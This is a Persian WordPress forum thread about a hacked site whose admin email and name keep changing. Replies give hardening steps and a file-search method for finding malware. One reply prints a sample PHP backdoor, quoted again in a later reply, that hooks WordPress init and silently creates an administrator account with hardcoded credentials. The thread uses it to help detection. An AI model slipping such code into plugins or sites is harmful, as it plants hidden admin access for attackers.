رفتن به مطلب

تغییر ایمیل و نام مدیر در وردپرس


ghorbanih91

پست های پیشنهاد شده

سلام دوستان یه مشکل خیلی ناجور دارم که بدجوری روانمو داغون کرده لطفا یکی یه کمکی برسونه

هر چند وقت یه بار ایمیل و نام مدیر تغییر پیدا میکنه(قطعا کسی به روشی به سایت نفوذه میکنه) و من مجبور میشم برم از پی اچ پی مای ادمین اطلاعات رو درست کنم.. حتی رو یه سایت دیگه همین مشکل رو داشتم نسخه پرمیوم آیتم سکوریتی رو هم نصب کردم باز همین مشکل وجود داشت.

لطفا از دوستان اگه کسی تجربه ای در این زمینه داره بگه

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

درود.

این کارها رو انجام بدید احتمالا مشکل حل خواهد شد :

  1. نام کاربری مدیر اگه admin هست به یک چیز دیگه تغییر بدید.
  2. بررسی کنید به غیر از اکانت شما، اکانت دیگه ای با سطح دسترسی مدیریت داخل سایت نباشه (از بخش کاربران در پیشخوان هم می تونید راحت چک کنید)
  3. رمزعبور هاست و اکانت مدیریت رو تغییر بدید.
  4. در فایل wp-config.php از کدهای Salt استفاده کنید تا دسترسی هایی که به پیشخوان هست کاملا قطع بشه و مجددا نیاز به لاگین کردن باشه. ( لینک ها تنها برای اعضای سایت قابل نمایش است. )

 

اینها در مواردی هستند که از تمامی موارد نصب شده روی وردپرس مطمئن باشیم. یعنی افزونه ها و قالب کاملا اورجینال باشند (نسخه نال شده نباشند)

یک نوع کد مخرب یا همون Malware وجود داره که می تونه بطور خودکار و بدون نیاز به داشتن رمزعبور و دسترسی مستقیم به پیشخوان یا هاست، یک اکانت مدیریت ایجاد کنه. افزونه های نال شده که چک نشده باشند و حاوی این کدها باشند، به راحتی قابل نفوذ خواهند بود. اگه مشکلتون با اون 4 مرحله حل نشد، قطعا سایتتون به این نوع Malware آلوده شده و نیاز به بررسی و آنالیز بیشتر داره تا مشکل حل بشه. این کار یک کار تخصصی هست ولی یه راهنمایی می کنم که شاید بتونید خودتون مشکل رو حل کنید.

 

  1. از پوشه wp_content یک فایل فشرده تهیه کنید، دانلودش کنید و توی دسکتاپ Extract کنید.
  2. نرم افزار NotePad++ رو دانلود و نصب کنید و اجراش کنید.
  3. توی نرم افزار NotePad++ کلید Ctrl+H رو بزنید، تب Find in Files رو کلیک کنید، داخل فیلد Find What بنویسید : wp_create_user
  4. در فیلد Directory هم پوشه wp-content که extract کردید رو بهش بدید و روی Find All کلیک کنید.
  5. اجازه بدید نرم افزار کل محتویات متنی این پوشه رو بگرده . اگه چنین عبارتی داخل فایل هاتون بود، احتمالا کدمخرب باشه.

 

یک نمونه کد مخرب که می تونه حساب کاربری مدیریت بسازه به این صورت هست. خودتون مقایسه کنید با کدهاتون که چنین چیزی هست یا خیر:

add_action('init', 'add_user');
    function add_user() {
        $username = 'username123';
        $password = 'pasword123';
        $email = 'drew@example.com';

        // Create the new user
        $user_id = wp_create_user( $username, $password, $email );

        // Get current user object
        $user = get_user_by( 'id', $user_id );

        // Remove role
        $user->remove_role( 'subscriber' );

        // Add role
        $user->add_role( 'administrator' );
    }

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

در ۱ ساعت قبل، Masih گفته است :

درود.

این کارها رو انجام بدید احتمالا مشکل حل خواهد شد :

  1. نام کاربری مدیر اگه admin هست به یک چیز دیگه تغییر بدید.
  2. بررسی کنید به غیر از اکانت شما، اکانت دیگه ای با سطح دسترسی مدیریت داخل سایت نباشه (از بخش کاربران در پیشخوان هم می تونید راحت چک کنید)
  3. رمزعبور هاست و اکانت مدیریت رو تغییر بدید.
  4. در فایل wp-config.php از کدهای Salt استفاده کنید تا دسترسی هایی که به پیشخوان هست کاملا قطع بشه و مجددا نیاز به لاگین کردن باشه. ( لینک ها تنها برای اعضای سایت قابل نمایش است. )

 

اینها در مواردی هستند که از تمامی موارد نصب شده روی وردپرس مطمئن باشیم. یعنی افزونه ها و قالب کاملا اورجینال باشند (نسخه نال شده نباشند)

یک نوع کد مخرب یا همون Malware وجود داره که می تونه بطور خودکار و بدون نیاز به داشتن رمزعبور و دسترسی مستقیم به پیشخوان یا هاست، یک اکانت مدیریت ایجاد کنه. افزونه های نال شده که چک نشده باشند و حاوی این کدها باشند، به راحتی قابل نفوذ خواهند بود. اگه مشکلتون با اون 4 مرحله حل نشد، قطعا سایتتون به این نوع Malware آلوده شده و نیاز به بررسی و آنالیز بیشتر داره تا مشکل حل بشه. این کار یک کار تخصصی هست ولی یه راهنمایی می کنم که شاید بتونید خودتون مشکل رو حل کنید.

 

  1. از پوشه wp_content یک فایل فشرده تهیه کنید، دانلودش کنید و توی دسکتاپ Extract کنید.
  2. نرم افزار NotePad++ رو دانلود و نصب کنید و اجراش کنید.
  3. توی نرم افزار NotePad++ کلید Ctrl+H رو بزنید، تب Find in Files رو کلیک کنید، داخل فیلد Find What بنویسید : wp_create_user
  4. در فیلد Directory هم پوشه wp-content که extract کردید رو بهش بدید و روی Find All کلیک کنید.
  5. اجازه بدید نرم افزار کل محتویات متنی این پوشه رو بگرده . اگه چنین عبارتی داخل فایل هاتون بود، احتمالا کدمخرب باشه.

 

یک نمونه کد مخرب که می تونه حساب کاربری مدیریت بسازه به این صورت هست. خودتون مقایسه کنید با کدهاتون که چنین چیزی هست یا خیر:


add_action('init', 'add_user');
    function add_user() {
        $username = 'username123';
        $password = 'pasword123';
        $email = 'drew@example.com';

        // Create the new user
        $user_id = wp_create_user( $username, $password, $email );

        // Get current user object
        $user = get_user_by( 'id', $user_id );

        // Remove role
        $user->remove_role( 'subscriber' );

        // Add role
        $user->add_role( 'administrator' );
    }

 

این موارد فک نمیکنم باشه چون هم یوزر و پسورد سخت گذاشته شده.. هم اینکه اکانت مدیر ساخته نمیشه فقط همون اکانتی که باهاش وردپرس نصب شده(یعنی اونی که آی دی 1 داره) "ایمیل و نامش تغییر پیدا میکنه" یعنی اگه مثلا ایمیل test@gmail.com هست و نام تست این دوتا تغییر میکنه و فقط تنها راهش اینه که بری پی اچ پی مای ادمین و باز به حالت اول برشون گردونی..

من یه سایت دیگه هم داشتم که اونم همین مشکل رو داشت و تنها البته رو هردو سایت upme نصب بوده.. ممکنه این افزونه upme باگ امنیتی داشته باشه؟

ممکنه با نصب wordfence مشکل رفع بشه؟

جالب اینجاست که این اکانتی که این اتفاق براش میفته نقش مدیر نداره و fronted vendor هست ولی وردپرس با این اکانت ساخته شده که بعدا ما نقشش رو به fronted vendor تغییر دادیم و الان یه کاربر دیگه مدیرکل هست. یعنی این باگ یا هرچیزی که هست فقط به اون کاربری که USER ID یک داره حمله میکنه.

 

ضمنا اگه متخصص امنیت وردپرس که بتونه روی امنیت سایت کار کنه سراغ دارید معرفی کنید

مرسی توجه..

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

بایگانی شده

این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.

مهمان
این موضوع برای عدم ارسال قفل گردیده است.
×
×
  • اضافه کردن...